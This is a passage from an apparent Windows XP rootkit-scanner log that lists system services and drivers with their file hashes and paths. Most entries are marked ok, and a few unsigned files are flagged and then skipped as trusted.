13:15:54.0718 0x08d8  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
13:15:54.0812 0x08d8  DcomLaunch - ok
13:15:54.0843 0x08d8  [ 5E38D7684A49CACFB752B046357E0589, F192AD4190BCFB6939A5CBC91648FE63168AF79A5E227A111DEAD6A92E42AB8D ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll
13:15:55.0015 0x08d8  Dhcp - ok
13:15:55.0046 0x08d8  [ 044452051F3E02E7963599FC8F4F3E25, 584BDDB074618BE76454CF90E74829CFF588B5B5FAEB793E2F7AAD26352DD689 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys
13:15:55.0218 0x08d8  Disk - ok
13:15:55.0218 0x08d8  dmadmin - ok
13:15:55.0296 0x08d8  [ D992FE1274BDE0F84AD826ACAE022A41, C82BD6561A14F2932A761F5883A787B99031250EE5E9B7B5714AA045545C9B99 ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys
13:15:55.0468 0x08d8  dmboot - ok
13:15:55.0500 0x08d8  [ 7C824CF7BBDE77D95C08005717A95F6F, A73CB323B7A6410C3D3F258BF204E716ADF8C84C9E4F6562C57AB73DAED8CCDE ] dmio            C:\WINDOWS\system32\drivers\dmio.sys
13:15:55.0656 0x08d8  dmio - ok
13:15:55.0687 0x08d8  [ E9317282A63CA4D188C0DF5E09C6AC5F, D41E002F555FE9015EF620975255F58BB79198CA1FF0E09EC950CB450FF77CF7 ] dmload          C:\WINDOWS\system32\drivers\dmload.sys
13:15:55.0843 0x08d8  dmload - ok
13:15:55.0875 0x08d8  [ 57EDEC2E5F59F0335E92F35184BC8631, 61F6F0DC2D1A6C61D5EF0D5CC4BE0FFC217F1E61FDA3EA9F704709293656600F ] dmserver        C:\WINDOWS\System32\dmserver.dll
13:15:56.0031 0x08d8  dmserver - ok
13:15:56.0046 0x08d8  [ 8A208DFCF89792A484E76C40E5F50B45, 4E40E2EB38C6254E7CAA488200E89EE7DEBBBA773890BC6A84313CC68178D54F ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys
13:15:56.0187 0x08d8  DMusic - ok
13:15:56.0218 0x08d8  [ 5F7E24FA9EAB896051FFB87F840730D2, 356EEFDCD54DECAD0170B34B993E4BF80DD039E2B2922D7A8D09B84031E9FC7A ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
13:15:56.0281 0x08d8  Dnscache - ok
13:15:56.0312 0x08d8  [ 0F0F6E687E5E15579EF4DA8DD6945814, 5C32D88119EB1465B2D719BEE2E05888D1A73454B5E33F2D4928DA710F8BFBA3 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll
13:15:56.0468 0x08d8  Dot3svc - ok
13:15:56.0468 0x08d8  dpti2o - ok
13:15:56.0500 0x08d8  [ 8F5FCFF8E8848AFAC920905FBD9D33C8, C8C6FB97AB0871C8C88A2201525A5CF10D5131CB6980D32692ED7A8F58399AD5 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
13:15:56.0656 0x08d8  drmkaud - ok
13:15:56.0671 0x08d8  [ 2187855A7703ADEF0CEF9EE4285182CC, 8233CC11F637866C0074043835A785EA2B616739B6B1181B143A253CF2508CFD ] EapHost         C:\WINDOWS\System32\eapsvc.dll
13:15:56.0843 0x08d8  EapHost - ok
13:15:56.0921 0x08d8  [ FCE87BA643D5E9A8B6E0378508D1B22D, 45B278A763FB183B2B29AF2D2B9D790BA97A800644942AE4AFBBDCF2864B5AB2 ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
13:15:56.0968 0x08d8  eeCtrl - ok
13:15:57.0000 0x08d8  [ BC93B4A066477954555966D77FEC9ECB, 27F5B780175EF46DA102EE33F7F33559C8B40C077EEA4405D579D9507F4B1C23 ] ERSvc           C:\WINDOWS\System32\ersvc.dll
13:15:57.0156 0x08d8  ERSvc - ok
13:15:57.0203 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] Eventlog        C:\WINDOWS\system32\services.exe
13:15:57.0250 0x08d8  Eventlog - ok
13:15:57.0296 0x08d8  [ D4991D98F2DB73C60D042F1AEF79EFAE, 58AF949EAEBF4FF3E3314DFB66CE4198BF65F0836B68CD27A6ED319742CCCCD2 ] EventSystem     C:\WINDOWS\system32\es.dll
13:15:57.0359 0x08d8  EventSystem - ok
13:15:57.0375 0x08d8  [ 38D332A6D56AF32635675F132548343E, E6909DB836AF679B4F4D62C7396D6C82769CC7ABB8C919C2AABFE934FCE268F6 ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys
13:15:57.0531 0x08d8  Fastfat - ok
13:15:57.0562 0x08d8  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
13:15:57.0609 0x08d8  FastUserSwitchingCompatibility - ok
13:15:57.0656 0x08d8  [ E97D6A8684466DF94FF3BC24FB787A07, 89E5A6889E3C5AB9AD3E80FFC16DD608278F3ADC282048B40B60196336A5CBEB ] Fax             C:\WINDOWS\system32\fxssvc.exe
13:15:57.0843 0x08d8  Fax - ok
13:15:57.0875 0x08d8  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81, 8307A532AB4D05CBBCE206DC2759497708BF5AAA880BD00F0E4F281D8578A1F5 ] Fdc             C:\WINDOWS\system32\DRIVERS\fdc.sys
13:15:58.0015 0x08d8  Fdc - ok
13:15:58.0046 0x08d8  [ D45926117EB9FA946A6AF572FBE1CAA3, 4C94EF009D778BE0BDF8F812F026B96F91F641BE30AA2531427A5E63DBD280DA ] Fips            C:\WINDOWS\system32\drivers\Fips.sys
13:15:58.0203 0x08d8  Fips - ok
13:15:58.0218 0x08d8  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0, 69C271AD5BCEBFD8AE5A769BDD7EC51256DA3A8ADAD5D12E5C0D13F4E82D8805 ] Flpydisk        C:\WINDOWS\system32\DRIVERS\flpydisk.sys
13:15:58.0375 0x08d8  Flpydisk - ok
13:15:58.0406 0x08d8  [ B2CF4B0786F8212CB92ED2B50C6DB6B0, 280F5CF8A90F7BEDE73ADD0DD0F8952088133A7CA9A3D3B7041957E33B36845D ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
13:15:58.0578 0x08d8  FltMgr - ok
13:15:58.0640 0x08d8  [ 8BA7C024070F2B7FDD98ED8A4BA41789, 47585006F86B2C6016EC54250A416794792D1E4024FF229C120BC25B684AF66A ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
13:15:58.0656 0x08d8  FontCache3.0.0.0 - ok
13:15:58.0687 0x08d8  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A, EC635E071201A766845D48973772CBE0958942B4162F3F5F70660D114CC877E0 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
13:15:58.0828 0x08d8  Fs_Rec - ok
13:15:58.0859 0x08d8  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
13:15:59.0031 0x08d8  Ftdisk - ok
13:15:59.0062 0x08d8  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
13:15:59.0078 0x08d8  GEARAspiWDM - ok
13:15:59.0109 0x08d8  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
13:15:59.0265 0x08d8  Gpc - ok
13:15:59.0343 0x08d8  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
13:15:59.0375 0x08d8  gupdate - ok
13:15:59.0375 0x08d8  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
13:15:59.0390 0x08d8  gupdatem - ok
13:15:59.0421 0x08d8  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
13:15:59.0578 0x08d8  HDAudBus - ok
13:15:59.0625 0x08d8  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
13:15:59.0796 0x08d8  helpsvc - ok
13:15:59.0812 0x08d8  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
13:15:59.0984 0x08d8  HidServ - ok
13:16:00.0015 0x08d8  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
13:16:00.0171 0x08d8  hidusb - ok
13:16:00.0218 0x08d8  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
13:16:00.0359 0x08d8  hkmsvc - ok
13:16:00.0375 0x08d8  hpn - ok
13:16:00.0468 0x08d8  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
13:16:00.0484 0x08d8  hpqcxs08 - ok
13:16:00.0546 0x08d8  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
13:16:00.0562 0x08d8  hpqddsvc - ok
13:16:00.0593 0x08d8  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
13:16:00.0640 0x08d8  HPSLPSVC - ok
13:16:00.0687 0x08d8  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
13:16:00.0859 0x08d8  HPZid412 - ok
13:16:00.0906 0x08d8  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
13:16:00.0953 0x08d8  HPZipr12 - ok
13:16:00.0984 0x08d8  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
13:16:01.0359 0x08d8  HPZius12 - ok
13:16:01.0406 0x08d8  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
13:16:01.0453 0x08d8  HTTP - ok
13:16:01.0484 0x08d8  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
13:16:01.0625 0x08d8  HTTPFilter - ok
13:16:01.0625 0x08d8  i2omp - ok
13:16:01.0656 0x08d8  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
13:16:01.0796 0x08d8  i8042prt - ok
13:16:01.0859 0x08d8  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
13:16:01.0937 0x08d8  ialm - ok
13:16:01.0984 0x08d8  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:16:02.0000 0x08d8  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
13:16:04.0812 0x08d8  Detect skipped due to KSN trusted
13:16:04.0812 0x08d8  IDriverT - ok
13:16:04.0890 0x08d8  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:16:04.0953 0x08d8  idsvc - ok
13:16:04.0968 0x08d8  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
13:16:05.0140 0x08d8  Imapi - ok
13:16:05.0187 0x08d8  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
13:16:05.0343 0x08d8  ImapiService - ok
13:16:05.0359 0x08d8  ini910u - ok
13:16:05.0562 0x08d8  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
13:16:05.0812 0x08d8  IntcAzAudAddService - ok
13:16:05.0859 0x08d8  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
13:16:06.0000 0x08d8  intelppm - ok
13:16:06.0078 0x08d8  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
13:16:06.0093 0x08d8  IntuitUpdateServiceV4 - ok
13:16:06.0125 0x08d8  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
13:16:06.0281 0x08d8  Ip6Fw - ok
13:16:06.0312 0x08d8  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
13:16:06.0468 0x08d8  IpFilterDriver - ok
13:16:06.0500 0x08d8  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
13:16:06.0625 0x08d8  IpInIp - ok
13:16:06.0656 0x08d8  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
13:16:06.0796 0x08d8  IpNat - ok
13:16:06.0875 0x08d8  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
13:16:06.0921 0x08d8  iPod Service - ok
13:16:06.0937 0x08d8  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
13:16:07.0093 0x08d8  IPSec - ok
13:16:07.0109 0x08d8  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
13:16:07.0250 0x08d8  IRENUM - ok
13:16:07.0265 0x08d8  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
13:16:07.0421 0x08d8  isapnp - ok
13:16:07.0531 0x08d8  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
13:16:07.0546 0x08d8  JavaQuickStarterService - ok
13:16:07.0562 0x08d8  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
13:16:07.0703 0x08d8  Kbdclass - ok
13:16:07.0734 0x08d8  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
13:16:07.0921 0x08d8  kmixer - ok
13:16:07.0937 0x08d8  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
13:16:08.0031 0x08d8  KSecDD - ok
13:16:08.0062 0x08d8  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
13:16:08.0125 0x08d8  lanmanserver - ok
13:16:08.0156 0x08d8  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
13:16:08.0203 0x08d8  lanmanworkstation - ok
13:16:08.0234 0x08d8  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
13:16:08.0406 0x08d8  LmHosts - ok
13:16:08.0421 0x08d8  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
13:16:08.0546 0x08d8  Messenger - ok
13:16:08.0562 0x08d8  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
13:16:08.0703 0x08d8  mnmdd - ok
13:16:08.0734 0x08d8  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
13:16:08.0890 0x08d8  mnmsrvc - ok
13:16:08.0906 0x08d8  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
13:16:09.0031 0x08d8  Modem - ok
13:16:09.0062 0x08d8  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
13:16:09.0187 0x08d8  Mouclass - ok
13:16:09.0218 0x08d8  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
13:16:09.0359 0x08d8  mouhid - ok
13:16:09.0375 0x08d8  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
13:16:09.0515 0x08d8  MountMgr - ok
13:16:09.0562 0x08d8  [ FD5E45969B82B83E33CB05B5C9B0E3F2, A6C21F7A0A97683DA50FC102131618CC1BE5CA0C3625D2FDAF5861B9B6523E45 ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
13:16:09.0593 0x08d8  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
13:16:12.0390 0x08d8  Detect skipped due to KSN trusted
13:16:12.0390 0x08d8  MozillaMaintenance - ok
13:16:12.0406 0x08d8  mraid35x - ok
13:16:12.0531 0x08d8  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
13:16:12.0703 0x08d8  MRxDAV - ok
13:16:12.0750 0x08d8  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
13:16:12.0921 0x08d8  MSDTC - ok
13:16:13.0000 0x08d8  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
13:16:13.0156 0x08d8  Msfs - ok
13:16:13.0171 0x08d8  MSIServer - ok
13:16:13.0203 0x08d8  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
13:16:13.0359 0x08d8  MSKSSRV - ok
13:16:13.0375 0x08d8  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
13:16:13.0531 0x08d8  MSPCLOCK - ok
13:16:13.0546 0x08d8  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
13:16:13.0734 0x08d8  MSPQM - ok
13:16:13.0812 0x08d8  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
13:16:13.0968 0x08d8  mssmbios - ok
13:16:14.0015 0x08d8  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
13:16:14.0109 0x08d8  Mup - ok
13:16:14.0437 0x08d8  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
13:16:14.0640 0x08d8  napagent - ok
13:16:14.0703 0x08d8  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
13:16:14.0859 0x08d8  NDIS - ok
13:16:14.0921 0x08d8  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
13:16:14.0968 0x08d8  NdisTapi - ok
13:16:15.0015 0x08d8  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
13:16:15.0156 0x08d8  Ndisuio - ok
13:16:15.0171 0x08d8  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
13:16:15.0328 0x08d8  NdisWan - ok
13:16:15.0343 0x08d8  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
13:16:15.0375 0x08d8  NDProxy - ok
13:16:15.0406 0x08d8  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
13:16:15.0421 0x08d8  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:16:18.0171 0x08d8  Detect skipped due to KSN trusted
13:16:18.0171 0x08d8  Net Driver HPZ12 - ok
13:16:18.0203 0x08d8  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
13:16:18.0406 0x08d8  NetBIOS - ok
13:16:18.0453 0x08d8  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
13:16:18.0593 0x08d8  NetBT - ok
13:16:18.0640 0x08d8  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
13:16:18.0781 0x08d8  NetDDE - ok
13:16:18.0796 0x08d8  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
13:16:18.0921 0x08d8  NetDDEdsdm - ok
13:16:18.0953 0x08d8  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
13:16:18.0968 0x08d8  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:16:21.0484 0x08d8  Detect skipped due to KSN trusted
13:16:21.0484 0x08d8  netfilter - ok
13:16:21.0515 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
13:16:21.0671 0x08d8  Netlogon - ok
13:16:21.0718 0x08d8  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
13:16:21.0875 0x08d8  Netman - ok
13:16:21.0906 0x08d8  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:16:21.0921 0x08d8  NetTcpPortSharing - ok
13:16:21.0968 0x08d8  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
13:16:22.0109 0x08d8  NIC1394 - ok
13:16:22.0140 0x08d8  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
